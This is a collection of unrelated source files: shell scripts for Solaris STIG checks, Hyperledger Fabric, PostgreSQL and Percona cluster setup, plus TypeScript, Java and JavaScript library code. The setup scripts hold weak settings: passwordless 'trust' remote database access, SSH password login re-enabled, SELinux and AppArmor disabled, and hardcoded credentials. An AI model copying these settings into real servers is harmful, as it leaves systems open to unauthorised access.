text stringlengths 1 1.05M |
|---|
#!/bin/bash
# Define the owner of p_dir
owner="root"
# Define the group of p_dir
group="root"
# Define the octal for p_dir
octal=00640
###############################################
# Bootstrapping environment setup
###############################################
# Get our working directory
cwd="$(pwd)"
# Define our bootstrapper location
bootstrap="${cwd}/tools/bootstrap.sh"
# Bail if it cannot be found
if [ ! -f ${bootstrap} ]; then
echo "Unable to locate bootstrap; ${bootstrap}" && exit 1
fi
# Load our bootstrap
source ${bootstrap}
###############################################
# Global zones only check
###############################################
# Make sure we are operating on global zones
if [ "$(zonename)" != "global" ]; then
report "${stigid} only applies to global zones" && exit 1
fi
###############################################
# Metrics start
###############################################
# Get EPOCH
s_epoch="$(gen_epoch)"
# Create a timestamp
timestamp="$(gen_date)"
# Whos is calling? 0 = singular, 1 is as group
caller=$(ps -p $PPID | grep -c stigadm)
###############################################
# Perform restoration
###############################################
# If ${restore} = 1 go to restoration mode
if [ ${restore} -eq 1 ]; then
report "Not yet implemented" && exit 1
fi
###############################################
# STIG validation/remediation
###############################################
# Obtain an array of audit settings regarding 'bin_file' plugin
audit_settings=( $(auditconfig -getplugin audit_binfile |
awk '$0 ~ /Attributes/{print $2}' | tr ';' ' ' | tr '=' ':') )
# Get the auditing filesystem from ${audit_settings[@]}
audit_folder="$(dirname $(get_inode "$(echo "${audit_settings[@]}" |
tr ' ' '\n' | grep "^p_dir" | cut -d: -f2)"))"
# If ${change} = 1
if [ ${change} -eq 1 ]; then
# Create the backup env
backup_setup_env "${backup_path}"
# Create a backup value
bu_blob="audit_binfile:setplugin:$(echo "${audit_settings[@]}" | tr ' ' ',')"
# Create a snapshot of ${users[@]}
bu_configuration "${backup_path}" "${author}" "${stigid}" "${bu_blob}"
if [ $? -ne 0 ]; then
# Print friendly message
report "Snapshot of current audit plugin values failed..."
# Stop, we require a backup
exit 1
fi
# Set user ownership on ${audit_folder}
chown ${owner} ${audit_folder} 2>/dev/null
# Trap error
[ $? -ne 0 ] && errors+=("${audit_folder}:${owner}:$(get_inode_user "${audit_folder}")")
# Set group ownership on ${audit_folder}
chgrp ${group} ${audit_folder} 2>/dev/null
# Trap error
[ $? -ne 0 ] && errors+=("${audit_folder}:${group}:$(get_inode_group "${audit_folder}")")
# Set permissions on ${audit_folder}
chmod ${octal} ${audit_folder} 2>/dev/null
# Trap error
[ $? -ne 0 ] && errors+=("${audit_folder}:${octal}:$(get_inode_user "${audit_folder}")")
# Restart the auditd service
audit -s 2>/dev/null
# Trap error
[ $? -ne 0 ] && errors+=("auditconfig:service:restart")
fi
# Validate user ownership
cowner="$(get_inode_user ${audit_folder})"
# Trap the error
[ "${cowner}" != "${owner}" ] &&
errors+=("Owner:${audit_folder}:${owner}:${cowner}")
# Show what we examined
inspected+=("Owner:${audit_folder}:${cowner}")
# Validate group ownership
cgroup="$(get_inode_group ${audit_folder})"
# Trap the error
[ "${cowner}" != "${owner}" ] &&
errors+=("Group:${audit_folder}:${group}:${cgroup}")
# Show what we examined
inspected+=("Group:${audit_folder}:${cgroup}")
# Validate octal
coctal="$(get_octal ${audit_folder})"
# Trap the error
[ ${coctal} -gt ${octal} ] &&
errors+=("Permissions:${audit_folder}:${octal}:${coctal}")
# Show what we examined
inspected+=("Permissons:${audit_folder}:${coctal}")
###############################################
# Results for printable report
###############################################
# If ${#errors[@]} > 0
if [ ${#errors[@]} -gt 0 ]; then
# Set ${results} error message
results="Failed validation"
fi
# Set ${results} passed message
[ ${#errors[@]} -eq 0 ] && results="Passed validation"
###############################################
# Report generation specifics
###############################################
# Apply some values expected for report footer
[ ${#errors[@]} -eq 0 ] && passed=1 || passed=0
[ ${#errors[@]} -gt 0 ] && failed=${#errors[@]} || failed=0
# Calculate a percentage from applied modules & errors incurred
percentage=$(percent ${passed} ${failed})
# If the caller was only independant
if [ ${caller} -eq 0 ]; then
# Provide detailed results to ${log}
if [ ${verbose} -eq 1 ]; then
# Print array of failed & validated items
[ ${#errors[@]} -gt 0 ] && print_array ${log} "errors" "${errors[@]}"
[ ${#inspected[@]} -gt 0 ] && print_array ${log} "validated" "${inspected[@]}"
fi
# Generate the report
report "${results}"
# Display the report
cat ${log}
else
# Since we were called from stigadm
module_header "${results}"
# Provide detailed results to ${log}
if [ ${verbose} -eq 1 ]; then
# Print array of failed & validated items
[ ${#errors[@]} -gt 0 ] && print_array ${log} "errors" "${errors[@]}"
[ ${#inspected[@]} -gt 0 ] && print_array ${log} "validated" "${inspected[@]}"
fi
# Finish up the module specific report
module_footer
fi
###############################################
# Return code for larger report
###############################################
# Return an error/success code (0/1)
exit ${#errors[@]}
# Date: 2018-09-05
#
# Severity: CAT-I
# Classification: UNCLASSIFIED
# STIG_ID: V0047875
# STIG_Version: SV-60747r1
# Rule_ID: SOL-11.1-010450
#
# OS: Solaris
# Version: 11
# Architecture: Sparc X86
#
# Title: The operating system must protect audit information from unauthorized modification.
# Description: The operating system must protect audit information from unauthorized modification.
|
#!/bin/sh
[ "$(uname -s)" != "Darwin" ] && exit 0
sed "s;/Users/mah7788;$HOME;g" \
"$DOTFILES"/iterm/com.googlecode.iterm2.plist.example > "$DOTFILES"/iterm/com.googlecode.iterm2.plist
defaults write com.googlecode.iterm2 "PrefsCustomFolder" -string "$DOTFILES/iterm"
defaults write com.googlecode.iterm2 "LoadPrefsFromCustomFolder" -bool true
|
<filename>src/manager.ts
import {
compareWithOriginal,
getPrimaryKeyInfo,
getRelationValues,
getTableName,
getValues,
isSaved,
mapValueProperties,
setSaved,
} from "./utils/models.ts";
import type { Adapter } from "./adapters/adapter.ts";
import { range } from "./utils/number.ts";
import { RelationType } from "./model.ts";
import { ModelQuery } from "./modelquery.ts";
import { Q } from "./q.ts";
/**
* Same as Partial<T> but goes deeper and makes Partial<T> all its properties and sub-properties.
*/
export type DeepPartial<T> = {
[P in keyof T]?: T[P] extends Array<infer U> ? Array<DeepPartial<U>>
: T[P] extends ReadonlyArray<infer U> ? ReadonlyArray<DeepPartial<U>>
: DeepPartial<T[P]>;
};
/**
* Query options to find a single record.
*/
export interface FindOneOptions<T> {
where?: DeepPartial<T>;
includes?: string[];
}
/**
* Query options to find multiple records.
*/
export type FindOptions<T> = FindOneOptions<T> & {
limit?: number;
offset?: number;
};
/**
* Manager allows you to perform queries to your model.
*/
export class Manager {
/**
* Create a model manager.
*
* @param adapter the database adapter to perform queries
*/
constructor(private adapter: Adapter) {}
/**
* Query a model.
*
* @param modelClass the model you want to query
*/
public query<T extends Object>(modelClass: { new (): T }): ModelQuery<T> {
return new ModelQuery(modelClass, this.adapter);
}
/**
* Save model a instance to the database.
*
* @param model the model you want to save
*/
public async save<T extends Object>(model: T): Promise<T>;
/**
* Save model instances to the database.
*
* @param models the models you want to save
*/
public async save<T extends Object>(models: T[]): Promise<T[]>;
/**
* Save model instance to the database.
*
* @param model the model you want to save
*/
public async save<T extends Object>(model: T | T[]): Promise<T | T[]> {
// If an Array of models is passed, perform INSERT in bulk.
// Otherwise, check if the model is already saved to the
// database or not. If it is, perform update instead of
if (Array.isArray(model)) {
// We wrap everything in transaction, this will undo every
// changes in the database if one of the queries fail.
await this.adapter.transaction(async () => {
// We need to group the models by it's constructor first
// in order to perform bulk insert.
for (const [key, value] of this.groupModels(model)) {
const insert: T[] = [];
// If one of the models is already saved, perform UPDATE.
for (const data of value) {
!data.isSaved
? insert.push(data.model)
: await this.update(data.model);
}
await this.bulkInsert(key, insert);
}
});
} else {
// If the record is saved, we assume that the user want to update the record.
// Otherwise, create a new record to the database.
isSaved(model)
? await this.update(model)
: await this.bulkInsert(model.constructor, [model]);
}
return model;
}
/**
* Remove given model instance from the database.
*
* @param model the model you want to remove.
*/
public async remove<T extends Object>(model: T): Promise<T>;
/**
* Remove given model instaces from the database.
*
* @param model the model you want to remove.
*/
public async remove<T extends Object>(model: T[]): Promise<T[]>;
/**
* Remove given model from the database.
*
* @param model the model you want to remove.
*/
public async remove<T extends Object>(model: T | T[]): Promise<T | T[]> {
if (Array.isArray(model)) {
// Just like save, wrap everything in transaction. This will undo
// every changes in the database if one of the queries fail.
await this.adapter.transaction(async () => {
for (const [key, value] of this.groupModels(model).entries()) {
const tableName = getTableName(key);
const primaryKeyInfo = getPrimaryKeyInfo(key);
// Holds the primary keys of the models to delete.
const ids: number[] = [];
// Holds the model instances to clear it's original values.
const models: T[] = [];
// Only delete saved models.
for (const item of value) {
if (item.isSaved) {
ids.push((item.model as any)[primaryKeyInfo.propertyKey]);
models.push(item.model);
}
}
// Perform bulk delete.
await this.adapter
.table(tableName)
.where(primaryKeyInfo.name, Q.in(ids))
.delete()
.execute();
// Set the `isSaved` value to be false on each models
// and remove their original values.
for (const item of models) {
delete (item as any)[primaryKeyInfo.propertyKey];
setSaved(item, false);
}
}
});
} else {
const tableName = getTableName(model.constructor);
const primaryKeyInfo = getPrimaryKeyInfo(model.constructor);
// Only remove model if it's already saved
if (isSaved(model)) {
const id = (model as any)[primaryKeyInfo.propertyKey];
await this.adapter
.table(tableName)
.where(primaryKeyInfo.name, id)
.delete()
.execute();
// Remove the primary key
delete (model as any)[primaryKeyInfo.propertyKey];
// Set the `isSaved` value to be false and remove the original values
setSaved(model, false);
}
}
return model;
}
/**
* Perform update to a model.
*
* @param model the model you want to update.
*/
private async update<T extends Object>(model: T): Promise<T> {
const tableName = getTableName(model.constructor);
const primaryKeyInfo = getPrimaryKeyInfo(model.constructor);
const { isDirty, diff } = compareWithOriginal(model);
if (isDirty) {
await this.adapter
.table(tableName)
.where(
primaryKeyInfo.name,
(model as any)[primaryKeyInfo.propertyKey],
)
.update(diff)
.execute();
// Save the model's original values
setSaved(model, true);
}
return model;
}
/**
* Group models by its constructor.
*/
private groupModels<T extends Object>(models: T[]) {
return models.reduce((prev, next, index) => {
const previousModels = prev.get(next.constructor);
const data = { model: next, index, isSaved: isSaved(next) };
prev.set(
next.constructor,
previousModels ? previousModels.concat(data) : [data],
);
return prev;
}, new Map<Function, { model: T; index: number; isSaved: boolean }[]>());
}
/**
* Insert multiple records to the database efficiently
*/
private async bulkInsert<T extends Object>(
modelClass: Function,
models: T[],
): Promise<T[]> {
const tableName = getTableName(modelClass);
const primaryKeyInfo = getPrimaryKeyInfo(modelClass);
// Get all model values
const values = models.map((model) => {
const values = getValues(model);
// If there's a belongs to relationship, add it to the INSERT statement
for (const relation of getRelationValues(model)) {
if (relation.description.type === RelationType.BelongsTo) {
values[relation.description.targetColumn] = relation.value as number;
}
}
return values;
});
// Execute query
const query = this.adapter.table(tableName).insert(values);
// The postgres adapter doesn't have any equivalient `lastInsertedId` property.
// So, we need to manually return the primary key.
if (this.adapter.dialect === "postgres") {
query.returning(primaryKeyInfo.name);
}
// Execute the query
const result = await query.execute();
// Get last inserted id
const lastInsertedId = this.adapter.dialect === "postgres"
? result[result.length - 1][primaryKeyInfo.name] as number
: this.adapter.lastInsertedId;
// Set the model primary keys
const ids = range(
lastInsertedId + 1 - models.length,
lastInsertedId,
);
// Assign values to the models
for (const [index, model] of models.entries()) {
// Get the models values that has been sent to the database
// and map column names from `name` to `propertyKey`.
const value = mapValueProperties(
model.constructor,
values[index],
"propertyKey",
);
// Set the primary key
value[primaryKeyInfo.propertyKey] = ids[index];
// Populate empty properties with default value
Object.assign(model, value);
// If there's a has many relationship, update the foreign key
for (const relation of getRelationValues(model)) {
if (relation.description.type === RelationType.HasMany) {
const ids = relation.value as number[];
const tableName = getTableName(relation.description.getModel());
const relationPkInfo = getPrimaryKeyInfo(
relation.description.getModel(),
);
await this.adapter
.table(tableName)
.update({
[relation.description.targetColumn]:
(model as any)[primaryKeyInfo.propertyKey],
})
.where(relationPkInfo.name, Q.in(ids))
.execute();
for (let i = 0; i < ids.length; i++) {
(model as any)[relation.description.propertyKey][i][
relation.description.targetColumn
] = (model as any)[primaryKeyInfo.propertyKey];
}
}
}
// Update the `isSaved` status and save the original values
setSaved(model, true);
}
return models;
}
}
|
#!/bin/bash
CLUSTER_NAME=$1
CHANNEL_NAME=$2
ORG_NAME=$3
ORDERER_NAME=$4
FABRIC_TOOLS_PATH=$5
FABRIC_OPERATE_SCRIPTS_PATH=$6
SAVE_CERTS_ROOT_PATH=$7
set -e
source $FABRIC_OPERATE_SCRIPTS_PATH/env.sh
export PATH=$PATH:$FABRIC_TOOLS_PATH
CHANNEL_DATA_DIR="$SAVE_CERTS_ROOT_PATH/$CLUSTER_NAME/channels/$CHANNEL_NAME"
ORG_LOWER_CASE=$(echo ${ORG_NAME} | tr '[A-Z]' '[a-z]')
generate_channel_tx() {
echo
echo "#################################################################"
echo "### Generating channel configuration transaction 'channel.tx' ###"
echo "#################################################################"
configtxgen -configPath $CHANNEL_DATA_DIR -profile TwoOrgsChannel -channelID $CHANNEL_NAME -outputCreateChannelTx $CHANNEL_DATA_DIR/channel.tx
}
create_channel() {
export CORE_PEER_LOCALMSPID=${ORG_NAME}MSP
export FABRIC_CFG_PATH=$SAVE_CERTS_ROOT_PATH/$CLUSTER_NAME/config
export CORE_PEER_MSPCONFIGPATH=$SAVE_CERTS_ROOT_PATH/$CLUSTER_NAME/crypto-config/peerOrganizations/$ORG_LOWER_CASE-$CLUSTER_NAME/users/Admin@$ORG_LOWER_CASE-$CLUSTER_NAME/msp
export ORDERER_CA=$SAVE_CERTS_ROOT_PATH/$CLUSTER_NAME/crypto-config/ordererOrganizations/$CLUSTER_NAME/users/Admin@$CLUSTER_NAME/tls/ca.crt
if [ $TLS_ENABLED = 'false' ]; then
peer channel create -o $ORDERER_NAME.$CLUSTER_NAME:7050 -c $CHANNEL_NAME -f $CHANNEL_DATA_DIR/channel.tx
else
export CORE_PEER_TLS_ENABLED=true
peer channel create -o $ORDERER_NAME.$CLUSTER_NAME:7050 -c $CHANNEL_NAME -f $CHANNEL_DATA_DIR/channel.tx --tls --cafile $ORDERER_CA
fi
# mv genesis block to channel dir
mv $CHANNEL_NAME.block $CHANNEL_DATA_DIR
log -n "create channel:$CHANNEL_NAME success."
}
echo "Generating channel.tx for $CHANNEL_NAME..."
generate_channel_tx
echo "Create channel $CHANNEL_NAME..."
create_channel |
<reponame>ryanlelek/atmosphere
'use strict';
// Modules
var _ = require('lodash');
module.exports = function (environment, config) {
// Ensure environment is an object
if (!_.isObject(environment)) {
throw new Error('Fatal: Provided environment is not an object!');
}
// Merge configuration object, if given
if (_.isObject(config)) {
_.merge(environment, config);
}
return {
get : function (name) {
return environment[name];
}
};
};
|
#!/usr/bin/env bash
DOC="Naval Fate.
Usage:
naval_fate.py ship new <name>...
naval_fate.py ship <name> move <x> <y> [--speed=<kn>]
naval_fate.py ship shoot <x> <y>
naval_fate.py mine (set|remove) <x> <y> [--moored|--drifting]
naval_fate.py -h | --help
naval_fate.py --version
Options:
-h --help Show this screen.
--version Show version.
--speed=<kn> Speed in knots [default: 10].
--moored Moored (anchored) mine.
--drifting Drifting mine.
"
"DOCOPT PARAMS"
eval "$(docopt "$@")"
declare -p
|
<reponame>AlvaWang/spring-may
package net.bambooslips.demo.jpa.repository;
import net.bambooslips.demo.jpa.model.FinancialForecasting;
import net.bambooslips.demo.jpa.model.FinancialHistorical;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.data.jpa.repository.Query;
import org.springframework.data.repository.query.Param;
import javax.transaction.Transactional;
import java.util.List;
/**
* Created by Administrator on 2017/4/21.
*/
@Transactional
public interface FinancialForecastingRepository extends JpaRepository<FinancialForecasting, Long> {
/**
* 查询
* @return
*/
@Query(
"Select ff.foreId,ff.foreYear FROM FinancialForecasting ff WHERE ff.entireId=:entireId "
)
List<FinancialForecasting> findByEntireId(@Param("entireId") Long entireId);
@Query(
"Select ff FROM FinancialForecasting ff WHERE ff.entireId=:entireId "
)
List<FinancialForecasting> findListByEntireId(@Param("entireId") Long entireId);
}
|
#!/bin/bash
## ======================================================================
## vabashvm - https://github.com/borntorun/vabashvm
## Author: João Carvalho
## https://raw.githubusercontent.com/borntorun/vabashvm/master/LICENSE
## ======================================================================
## Install postgres 9.3 Database Server
##
## optional:
## $1 - user in the system to create in server
## #2 - remote_net_access in the form nnn.nnn.nnn.nnn/prefix (no validation is made)
##
## This script was tested sucessfully in:
## - CentOS 7 (64bit)
## ======================================================================
# if an error occurs stops
#set -e
: ${_thispackage="postgres"}
: ${_thisfilename=${0##*/}}
printf "\nvabashvm:$(date +"%H:%M:%S"):==>$_thispackage:Running [%s]..." "$0"
#printf -- "[%s]-" $*
output()
{
(printf "\n\t$(date +"%H:%M:%S"):==>$_thispackage:"; printf "$@")
}
: ${_user_="$1"}
: ${_remote_net="$2"}
: ${_data_dir="/var/lib/pgsql/9.3/data/"}
: ${_instal_dir="/usr/local/pgsql/bin"}
output "Installing..."
yum -y install http://yum.postgresql.org/9.3/redhat/rhel-7-x86_64/pgdg-centos93-9.3-1.noarch.rpm >/dev/null
[[ $? -eq 0 ]] && output "Repo installed." && yum -y install postgresql93-server postgresql93-contrib >/dev/null
[[ ! $? -eq 0 ]] && output "Error installing package." || {
output "Package installed.\n"
/usr/pgsql-9.3/bin/postgresql93-setup initdb
[[ ! $? -eq 0 ]] && output "Error: running [postgresql93-setup initdb]."
systemctl enable postgresql-9.3.service && systemctl start postgresql-9.3.service
[[ ! $? -eq 0 ]] && output "Error enabling or starting service."
## permits remote access
[[ ! -z $_remote_net ]] && {
cp "${_data_dir}pg_hba.conf" "${_data_dir}pg_hba.conf.original"
[[ $? -eq 0 ]] && echo "host all all ${_remote_net} trust" >> "${_data_dir}pg_hba.conf"
cp "${_data_dir}postgresql.conf" "${_data_dir}postgresql.conf.original"
[[ $? -eq 0 ]] && sed -i "s|^#listen_addresses.*$|listen_addresses = '*'|" "${_data_dir}postgresql.conf"
}
## create user
[[ ! -z $_remote_net ]] && {
sudo -u postgres createuser -s "$_user_" >/dev/null 2>/dev/null
[[ ! $? -eq 0 ]] && output "Error: User [%s] not created." "${_user_}"
}
firewall-cmd --permanent --add-port=5432/tcp >/dev/null && firewall-cmd --reload >/dev/null
[[ ! $? -eq 0 ]] && output "Error enabling firewall.\n"
systemctl restart postgresql-9.3.service
[[ ! $? -eq 0 ]] && output "Error starting service."
echo "pathmunge ${_instal_dir}/bin"$'\n'"export PATH" >> /etc/profile.d/z_vabashvm_${_thispackage}.sh
}
printf "\nvabashvm:$(date +"%H:%M:%S"):==>$_thispackage:End [%s]." "$0"
exit 0
|
#!/bin/bash
# This script is only tested on CentOS 6.5 and Ubuntu 12.04 LTS with Percona XtraDB Cluster 5.6.
# You can customize variables such as MOUNTPOINT, RAIDCHUNKSIZE and so on to your needs.
# You can also customize it to work with other Linux flavours and versions.
# If you customize it, copy it to either Azure blob storage or Github so that Azure
# custom script Linux VM extension can access it, and specify its location in the
# parameters of DeployPXC powershell script or runbook or Azure Resource Manager CRP template.
CLUSTERADDRESS=${1}
NODEADDRESS=${2}
NODENAME=$(hostname)
MYSQLSTARTUP=${3}
MYCNFTEMPLATE=${4}
SECONDNIC=${5}
MOUNTPOINT="/datadrive"
RAIDCHUNKSIZE=512
RAIDDISK="/dev/md127"
RAIDPARTITION="/dev/md127p1"
# An set of disks to ignore from partitioning and formatting
BLACKLIST="/dev/sda|/dev/sdb"
check_os() {
grep ubuntu /proc/version > /dev/null 2>&1
isubuntu=${?}
grep centos /proc/version > /dev/null 2>&1
iscentos=${?}
}
scan_for_new_disks() {
# Looks for unpartitioned disks
declare -a RET
DEVS=($(ls -1 /dev/sd*|egrep -v "${BLACKLIST}"|egrep -v "[0-9]$"))
for DEV in "${DEVS[@]}";
do
# Check each device if there is a "1" partition. If not,
# "assume" it is not partitioned.
if [ ! -b ${DEV}1 ];
then
RET+="${DEV} "
fi
done
echo "${RET}"
}
get_disk_count() {
DISKCOUNT=0
for DISK in "${DISKS[@]}";
do
DISKCOUNT+=1
done;
echo "$DISKCOUNT"
}
create_raid0_ubuntu() {
dpkg -s mdadm
if [ ${?} -eq 1 ];
then
echo "installing mdadm"
wget --no-cache http://mirrors.cat.pdx.edu/ubuntu/pool/main/m/mdadm/mdadm_3.2.5-5ubuntu4_amd64.deb
dpkg -i mdadm_3.2.5-5ubuntu4_amd64.deb
fi
echo "Creating raid0"
udevadm control --stop-exec-queue
echo "yes" | mdadm --create "$RAIDDISK" --name=data --level=0 --chunk="$RAIDCHUNKSIZE" --raid-devices="$DISKCOUNT" "${DISKS[@]}"
udevadm control --start-exec-queue
mdadm --detail --verbose --scan > /etc/mdadm.conf
}
create_raid0_centos() {
echo "Creating raid0"
yes | mdadm --create "$RAIDDISK" --name=data --level=0 --chunk="$RAIDCHUNKSIZE" --raid-devices="$DISKCOUNT" "${DISKS[@]}"
mdadm --detail --verbose --scan > /etc/mdadm.conf
}
do_partition() {
# This function creates one (1) primary partition on the
# disk, using all available space
DISK=${1}
echo "Partitioning disk $DISK"
echo "n
p
1
w
" | fdisk "${DISK}"
#> /dev/null 2>&1
#
# Use the bash-specific $PIPESTATUS to ensure we get the correct exit code
# from fdisk and not from echo
if [ ${PIPESTATUS[1]} -ne 0 ];
then
echo "An error occurred partitioning ${DISK}" >&2
echo "I cannot continue" >&2
exit 2
fi
}
add_to_fstab() {
UUID=${1}
MOUNTPOINT=${2}
grep "${UUID}" /etc/fstab >/dev/null 2>&1
if [ ${?} -eq 0 ];
then
echo "Not adding ${UUID} to fstab again (it's already there!)"
else
LINE="UUID=${UUID} ${MOUNTPOINT} ext4 defaults,noatime 0 0"
echo -e "${LINE}" >> /etc/fstab
fi
}
configure_disks() {
ls "${MOUNTPOINT}"
if [ ${?} -eq 0 ]
then
return
fi
DISKS=($(scan_for_new_disks))
echo "Disks are ${DISKS[@]}"
declare -i DISKCOUNT
DISKCOUNT=$(get_disk_count)
echo "Disk count is $DISKCOUNT"
if [ $DISKCOUNT -gt 1 ];
then
if [ $iscentos -eq 0 ];
then
create_raid0_centos
elif [ $isubuntu -eq 0 ];
then
create_raid0_ubuntu
fi
do_partition ${RAIDDISK}
PARTITION="${RAIDPARTITION}"
else
DISK="${DISKS[0]}"
do_partition ${DISK}
PARTITION=$(fdisk -l ${DISK}|grep -A 1 Device|tail -n 1|awk '{print $1}')
fi
echo "Creating filesystem on ${PARTITION}."
mkfs -t ext4 lazy_itable_init=1 ${PARTITION}
mkdir "${MOUNTPOINT}"
read UUID FS_TYPE < <(blkid -u filesystem ${PARTITION}|awk -F "[= ]" '{print $3" "$5}'|tr -d "\"")
add_to_fstab "${UUID}" "${MOUNTPOINT}"
echo "Mounting disk ${PARTITION} on ${MOUNTPOINT}"
mount "${MOUNTPOINT}"
}
open_ports() {
iptables -A INPUT -p tcp -m tcp --dport 3306 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 4444 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 4567 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 4568 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 9200 -j ACCEPT
iptables-save
}
disable_apparmor_ubuntu() {
/etc/init.d/apparmor teardown
update-rc.d -f apparmor remove
}
disable_selinux_centos() {
sed -i 's/^SELINUX=.*/SELINUX=disabled/I' /etc/selinux/config
setenforce 0
}
activate_secondnic_centos() {
if [ -n "$SECONDNIC" ];
then
cp /etc/sysconfig/network-scripts/ifcfg-eth0 "/etc/sysconfig/network-scripts/ifcfg-${SECONDNIC}"
sed -i "s/^DEVICE=.*/DEVICE=${SECONDNIC}/I" "/etc/sysconfig/network-scripts/ifcfg-${SECONDNIC}"
defaultgw=$(ip route show |sed -n "s/^default via //p")
declare -a gateway=(${defaultgw// / })
sed -i "\$aGATEWAY=${gateway[0]}" /etc/sysconfig/network
service network restart
fi
}
configure_network() {
open_ports
if [ $iscentos -eq 0 ];
then
activate_secondnic_centos
disable_selinux_centos
elif [ $isubuntu -eq 0 ];
then
disable_apparmor_ubuntu
fi
}
create_mycnf() {
wget "${MYCNFTEMPLATE}" -O /etc/my.cnf
sed -i "s/^wsrep_cluster_address=.*/wsrep_cluster_address=gcomm:\/\/${CLUSTERADDRESS}/I" /etc/my.cnf
sed -i "s/^wsrep_node_address=.*/wsrep_node_address=${NODEADDRESS}/I" /etc/my.cnf
sed -i "s/^wsrep_node_name=.*/wsrep_node_name=${NODENAME}/I" /etc/my.cnf
if [ $isubuntu -eq 0 ];
then
sed -i "s/^wsrep_provider=.*/wsrep_provider=\/usr\/lib\/libgalera_smm.so/I" /etc/my.cnf
fi
}
install_mysql_ubuntu() {
dpkg -s percona-xtradb-cluster-56
if [ ${?} -eq 0 ];
then
return
fi
echo "installing mysql"
apt-key adv --keyserver keys.gnupg.net --recv-keys 1C4CBDCDCD2EFD2A
grep "repo.percona.com" /etc/apt/sources.list >/dev/null 2>&1
if [ ${?} -ne 0 ];
then
echo "deb http://repo.percona.com/apt precise main" >> /etc/apt/sources.list
echo "deb-src http://repo.percona.com/apt precise main" >> /etc/apt/sources.list
fi
apt-get update
export DEBIAN_FRONTEND=noninteractive
apt-get -q -y install percona-xtradb-cluster-56
apt-get -y install xinetd
}
install_mysql_centos() {
yum list installed Percona-XtraDB-Cluster-56
if [ ${?} -eq 0 ];
then
return
fi
echo "installing mysql"
yum -y install http://www.percona.com/downloads/percona-release/redhat/0.1-3/percona-release-0.1-3.noarch.rpm
wget --no-cache https://dl.fedoraproject.org/pub/epel/epel-release-latest-6.noarch.rpm
rpm -Uvh epel-release-latest-6.noarch.rpm
yum -y install libev
yum -y install Percona-XtraDB-Cluster-56
yum -y install xinetd
}
configure_mysql() {
/etc/init.d/mysql status
if [ ${?} -eq 0 ];
then
return
fi
create_mycnf
mkdir "${MOUNTPOINT}/mysql"
ln -s "${MOUNTPOINT}/mysql" /var/lib/mysql
chmod o+x /var/lib/mysql
if [ $iscentos -eq 0 ];
then
install_mysql_centos
elif [ $isubuntu -eq 0 ];
then
install_mysql_ubuntu
fi
/etc/init.d/mysql stop
chmod o+x "${MOUNTPOINT}/mysql"
grep "mysqlchk" /etc/services >/dev/null 2>&1
if [ ${?} -ne 0 ];
then
sed -i "\$amysqlchk 9200\/tcp #mysqlchk" /etc/services
fi
service xinetd restart
sstmethod=$(sed -n "s/^wsrep_sst_method=//p" /etc/my.cnf)
sst=$(sed -n "s/^wsrep_sst_auth=//p" /etc/my.cnf | cut -d'"' -f2)
declare -a sstauth=(${sst//:/ })
if [ $sstmethod == "mysqldump" ]; #requires root privilege for sstuser on every node
then
/etc/init.d/mysql bootstrap-pxc
echo "CREATE USER '${sstauth[0]}'@'localhost' IDENTIFIED BY '${sstauth[1]}';" > /tmp/mysqldump-pxc.sql
echo "GRANT ALL PRIVILEGES ON *.* TO '${sstauth[0]}'@'localhost' with GRANT OPTION;" >> /tmp/mysqldump-pxc.sql
echo "CREATE USER '${sstauth[0]}'@'%' IDENTIFIED BY '${sstauth[1]}';" >> /tmp/mysqldump-pxc.sql
echo "GRANT ALL PRIVILEGES ON *.* TO '${sstauth[0]}'@'%' with GRANT OPTION;" >> /tmp/mysqldump-pxc.sql
echo "FLUSH PRIVILEGES;" >> /tmp/mysqldump-pxc.sql
mysql < /tmp/mysqldump-pxc.sql
/etc/init.d/mysql stop
fi
/etc/init.d/mysql $MYSQLSTARTUP
if [ $MYSQLSTARTUP == "bootstrap-pxc" ];
then
if [ $sstmethod != "mysqldump" ];
then
echo "CREATE USER '${sstauth[0]}'@'localhost' IDENTIFIED BY '${sstauth[1]}';" > /tmp/bootstrap-pxc.sql
echo "GRANT RELOAD, LOCK TABLES, REPLICATION CLIENT ON *.* TO '${sstauth[0]}'@'localhost';" >> /tmp/bootstrap-pxc.sql
fi
echo "CREATE USER 'clustercheckuser'@'localhost' identified by 'clustercheckpassword!';" >> /tmp/bootstrap-pxc.sql
echo "GRANT PROCESS on *.* to 'clustercheckuser'@'localhost';" >> /tmp/bootstrap-pxc.sql
echo "CREATE USER 'test'@'%' identified by '${sstauth[1]}';" >> /tmp/bootstrap-pxc.sql
echo "GRANT select on *.* to 'test'@'%';" >> /tmp/bootstrap-pxc.sql
echo "FLUSH PRIVILEGES;" >> /tmp/bootstrap-pxc.sql
mysql < /tmp/bootstrap-pxc.sql
fi
}
allow_passwordssh() {
grep -q '^PasswordAuthentication yes' /etc/ssh/sshd_config
if [ ${?} -eq 0 ];
then
return
fi
sed -i "s/^#PasswordAuthentication.*/PasswordAuthentication yes/I" /etc/ssh/sshd_config
sed -i "s/^PasswordAuthentication no.*/PasswordAuthentication yes/I" /etc/ssh/sshd_config
/etc/init.d/sshd reload
}
# temporary workaround form CRP
allow_passwordssh
check_os
if [ $iscentos -ne 0 ] && [ $isubuntu -ne 0 ];
then
echo "unsupported operating system"
exit 1
else
configure_network
configure_disks
configure_mysql
fi
|
#!/usr/bin/env bash
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
shopt -s nocasematch
set -u # nounset
set -e # errexit
set -E # errtrap
set -o pipefail
#
# Gets a bash shell for a container
#
function help {
echo " "
echo "usage: ${0}"
echo " --container-name [OPTIONAL] The Docker container name. Default: bro"
echo " -h/--help Usage information."
echo " "
echo " "
}
CONTAINER_NAME=bro
# handle command line options
for i in "$@"; do
case $i in
#
# CONTAINER_NAME
#
# --container-name
#
--container-name=*)
CONTAINER_NAME="${i#*=}"
shift # past argument=value
;;
#
# -h/--help
#
-h | --help)
help
exit 0
shift # past argument with no value
